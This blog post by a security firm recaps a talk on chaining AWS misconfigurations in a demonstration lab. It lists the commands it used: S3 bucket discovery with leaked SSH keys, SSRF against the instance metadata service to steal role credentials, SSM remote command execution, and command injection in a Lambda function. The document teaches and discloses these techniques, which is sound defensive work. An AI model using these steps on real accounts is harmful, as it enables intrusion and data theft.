Getting shell and data access in AWS by chaining vulnerabilities

Riyaz Walikar
Appsecco
Aug 29, 2019 · 9 min read

Slides from a talk on using misconfigurations, overly permissive IAM policies and application security vulnerabilities to get shells in AWS EC2 instances and go beyond the plane of attack. Presented at the OWASP Bay Area August 2019 meetup.

Updated 3rd December 2019: Please note that AWS has released additional security defences against the attacks mentioned in this blog post. While the methods described here will work with the legacy version of the Instance Metadata Service (IMDSv1), they will be thwarted by IMDSv2. Read our extensive blog post on how to use AWS EC2 IMDSv2 and add these additional defences to your EC2 machines:

https://blog.appsecco.com/getting-started-with-version-2-of-aws-ec2-instance-metadata-service-imdsv2-2ad03a1f3650

Slides of the talk

Here are all the slides from the talk, containing the full commands and screenshots for the various exploitation scenarios.

What was the talk about?

The talk primarily covered three scenarios, set up based on real-world cases from our penetration testing exercises, that led to shell access and to data beyond the EC2 instances that were compromised.

One of the scenarios is also covered in our “Breaking and Owning Applications and Servers on AWS and Azure” class (discover and exploit) and in the Automated Defence training that we run at BlackHat (how to automatically defend against this vulnerability in AWS).

All three scenarios, along with additional exploitation scenarios and attacks across multiple cloud providers, are being added to our new pentester-focused training titled “Attacking and Exploiting flaws in the Cloud”.

Coming back to the talk, I covered the steps we took in our assessments to detect, exploit and gain access to resources within AWS using a step-by-step approach. All the scenarios were explained with commands and demonstrated on a live lab set up for the talk.

Case 1: Misconfigured bucket to system shells

This scenario covered a case where we were able to use DNS information (something that we actively look for during our Penetration Testing exercises) to identify the naming convention of S3 buckets for an organisation. We used this information to discover additional buckets, one of which contained multiple SSH keys.

We started by looking at the target application, http://www.galaxybutter.co.

We looked up the nameservers for galaxybutter.co and then queried one of the discovered nameservers for the CNAME and TXT records of the domain:

dig NS galaxybutter.co
dig CNAME @ns-296.awsdns-37.com www.galaxybutter.co
dig TXT @ns-296.awsdns-37.com galaxybutter.co

For the IP address discovered in the TXT records, we ran a port scan to find services exposed to the Internet/our IP address.

The -g80 flag sets the source port to TCP port 80, which, in theory, allows nmap to reach ports behind stateless firewalls that presume the traffic is a response to a web request sent from behind the firewall.
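
The scan looked roughly like the following; the exact flags are in the slides and the target IP below is only a placeholder

# Illustrative full TCP port scan with the source port set to 80
sudo nmap -Pn -sS -g80 -p- --open <ip-from-TXT-record>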

We saved the result to come back to it later.

The next step was to identify if there are any other buckets that follow the same naming convention as the CNAME for www.galaxybutter.co. We created a custom dictionary based on the naming convention and ran that against AWS using DigiNinja’s bucket_finder tool.
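
The run against AWS looked something like this; the wordlist name is only illustrative

# Illustrative run of DigiNinja's bucket_finder with our custom wordlist
./bucket_finder.rb galaxybutter-bucket-names.txt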

In an open bucket we found a zip file called sales-marketing-app.zip which contained what looked like multiple SSH private keys.

We attempted to log in to the multiple IP addresses we had discovered so far with common AWS Linux usernames (ubuntu, ec2-user, root etc.) and were able to log in to one of the servers.

ssh -i sales-marketing-app.pem ubuntu@54.211.12.132

Once we had SSH’ed into the server, we browsed the file system as part of post exploitation and found credentials for an RDS database server in a configuration file.

The database was not accessible from the Internet but was reachable from the EC2 instance, so we connected to it from there and dumped the first 5 rows of a table, revealing usernames and password hashes!
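
The connection and query looked roughly like the following, assuming a MySQL-flavoured RDS instance; the endpoint, username and table name are placeholders

# Connect to the RDS endpoint using the credentials found in the configuration file
mysql -h <rds-endpoint>.us-east-1.rds.amazonaws.com -u <user-from-config> -p
# Dump the first 5 rows of a table of interest
mysql> SELECT * FROM users LIMIT 5;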

Essentially, a weakly configured S3 bucket, whose naming convention was obtained through DNS enumeration, gave us access to data inside AWS RDS.

Case 2: SSRF to Shell via IAM Policies

This scenario was very similar to the recent Capital One breach. We wrote a technical blog post on what could have transpired based on the available information.

An application was discovered with a login page and user registration capability. Post login, the application allowed users to input a URL, and the server would issue a web request on behalf of the user. Classic SSRF!

Using the SSRF we were able to query the meta-data service at http://169.254.169.254 and obtain information about the instance.
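
In practice this meant passing the metadata URLs as the user-supplied URL to the application, along the lines of the following (the application host and parameter name are illustrative)

http://vulnerable-app.example.com/fetch?url=http://169.254.169.254/latest/meta-data/
http://vulnerable-app.example.com/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/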

We were able to access the temporary token of a role attached to the EC2 instance using the URL

http://169.254.169.254/latest/meta-data/iam/security-credentials/ec2serverhealthrole
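
The response from IMDSv1 is a JSON document containing the temporary credentials of the role; the values below are redacted placeholders

{
  "Code" : "Success",
  "LastUpdated" : "2019-08-29T10:00:00Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIA...REDACTED",
  "SecretAccessKey" : "REDACTED",
  "Token" : "REDACTED",
  "Expiration" : "2019-08-29T16:30:00Z"
}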

We added the creds to our local AWS CLI using the following command

aws configure --profile stolencreds

As these are temporary tokens, a variable called aws_session_token also needs to be added to the ~/.aws/credentials file. This variable can also be added as an environment variable for the AWS CLI to work with the new creds.
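
The resulting profile entry in ~/.aws/credentials looks like this (values redacted)

[stolencreds]
aws_access_key_id = ASIA...REDACTED
aws_secret_access_key = REDACTED
aws_session_token = REDACTED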

A quick check to see if the creds are set up properly is to use the following command, much like whoami in the Linux/Windows world

aws sts get-caller-identity --profile stolencreds
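
For credentials lifted from an instance profile, the output identifies the assumed role; the account ID and instance ID below are placeholders

{
    "UserId": "AROAEXAMPLEID:i-0123456789abcdef0",
    "Account": "123456789012",
    "Arn": "arn:aws:sts::123456789012:assumed-role/ec2serverhealthrole/i-0123456789abcdef0"
}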

The newly added credentials were then used to enumerate S3 buckets and download data from them using the following commands

aws s3 ls --profile stolencreds
aws s3 ls s3://data.serverhealth-corporation --profile stolencreds
aws s3 sync s3://data.serverhealth-corporation . --profile stolencreds

As the credentials were privileged, we then obtained command execution on one of the running EC2 instances within the environment using the AWS SSM service.

We enumerated the instances that had the AWS SSM service running using the command

aws ssm describe-instance-information --profile stolencreds

Then, using the instance ID from the describe-instance-information output above, we ran send-command and list-command-invocations to execute ifconfig and read its output respectively.

aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds

aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds

Essentially, an application vulnerable to a Server Side Request Forgery allowed access to the temporary credentials of an IAM role that was attached to the EC2 instance. This role had extensive permissions that allowed us to gain access to the entire AWS account of the target organisation and shell access to the EC2 instances using the AWS SSM service.

Case 3: Client-Side Keys, IAM Policies and a Vulnerable Lambda

A web application that allowed users to upload files to an S3 bucket was using privileged IAM keys in the client side JavaScript. It was possible to use these keys to query various services inside AWS. We found multiple Lambda functions in the AWS account. Downloading and analysing one of the Lambda functions led to the discovery of a code injection vulnerability that gave us access to the Lambda runtime environment.

We also enumerated the EC2 instances running within this environment and gained access to one of them using the new EC2 Instance Connect feature for SSH access from AWS.

We started by looking at the client’s web app and found functionality to upload files.

The site itself was static (hosted on S3) but it was performing dynamic actions (uploads to S3). We poked around the JavaScript, as that was the only dynamic component here, and discovered AWS keys in the client-side JS.
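
A quick way to spot such keys is to pull down the site’s JavaScript and grep for the AWS SDK configuration; the URL and file name below are illustrative

# Fetch the static site's JS and look for embedded AWS credentials
wget -q http://target-app.s3-website-us-east-1.amazonaws.com/js/app.js -O app.js
grep -E 'accessKeyId|secretAccessKey' app.js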

We added these keys to our AWS CLI and ran the ScoutSuite tool from NCC Group. The tool is available on GitHub at https://github.com/nccgroup/ScoutSuite

scout --profile uploadcreds

This returned a complete picture of the AWS environment. We found that the account had multiple Lambda functions running with the AWS API Gateway added as a trigger. One such endpoint seemed to accept user input and returned the MD5 sum of the string passed as input.
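
Calling the endpoint looked roughly like this; the API Gateway URL and parameter name are placeholders

curl "https://abcdef1234.execute-api.us-east-1.amazonaws.com/api/md5?value=hello"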

We downloaded the code for the Lambda functions using the following commands

aws lambda list-functions --profile uploadcreds

aws lambda get-function --function-name lambda-name-here-from-previous-query --query 'Code.Location' --profile uploadcreds

wget -O lambda-function.zip url-from-previous-query

The downloaded zip contained the code for the Lambda function.

Upon inspection, it was discovered that the code had a command injection vulnerability
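
As a rough illustration, if the Lambda builds a shell command around the user input to compute the hash, a payload like the one below (URL-encoded as needed) executes an extra command and can leak the function’s environment, which includes the temporary credentials of its execution role; the URL is the same placeholder as above

# Illustrative command injection payload appended to the expected input
curl "https://abcdef1234.execute-api.us-east-1.amazonaws.com/api/md5?value=hello;env"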

Finally, to get a shell on one of the instances and show impact, we used a relatively new feature of AWS EC2 called EC2 Instance Connect for SSH access.

You can read more about this feature here: https://aws.amazon.com/blogs/compute/new-using-amazon-ec2-instance-connect-for-ssh-access-to-your-ec2-instances/
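
A minimal sketch of using Instance Connect with the stolen credentials: push a temporary public key to the instance and SSH in before the key expires (it is only valid for roughly 60 seconds); the instance ID, availability zone and key files are placeholders

aws ec2-instance-connect send-ssh-public-key --instance-id i-0123456789abcdef0 --availability-zone us-east-1a --instance-os-user ubuntu --ssh-public-key file://mykey.pub --profile uploadcreds
ssh -i mykey ubuntu@<instance-public-ip>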

In Closing

Some thoughts summarising the talk were also shared with the audience:

  • As we started with, and as should be evident by now, the most common theme is the misconfiguration of services, insecure programming, and permissions that should never have been granted
  • Reconnaissance and OSINT are key for a lot of cloud services and applications
  • When attacking apps and servers, it is important to identify key DNS, whois, IP history and sub-domain information
  • Post exploitation has no limits with the cloud. You can attack additional services, disrupt logging, make code changes to attack users. Your imagination (and the agreement with your client) is the limit
  • There are a ton of tools that security folks have written on GitHub and a lot of work is being done in the attack and exploitation areas
  • The key to learning to attack is to Setup > Break > Learn > Repeat

If you want us to take a look at your cloud hosted web applications or your cloud architecture to simulate attacks and identify weaknesses before the bad guys do, or if you want to run one of our training programs for your teams, get in touch with us.

At Appsecco we provide advice, testing, training and insight around software and website security, especially anything that’s online, and its associated hosting infrastructure: websites, e-commerce sites, online platforms, mobile technology, web-based services etc.
